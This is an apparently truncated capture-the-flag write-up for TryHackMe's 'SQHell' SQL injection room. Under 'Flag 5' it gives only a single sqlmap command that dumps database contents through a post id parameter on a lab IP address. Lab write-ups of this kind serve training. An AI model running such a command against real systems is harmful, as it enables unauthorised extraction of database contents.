TryHackMe - SQHell - Writeup

Try and find all the flags in the SQL Injections

Finding Flags

Flag 5

root@ip-10-10-216-245:~# sqlmap -u "http://10.10.255.171/post?id=2" -dump
Written on May 21, 2021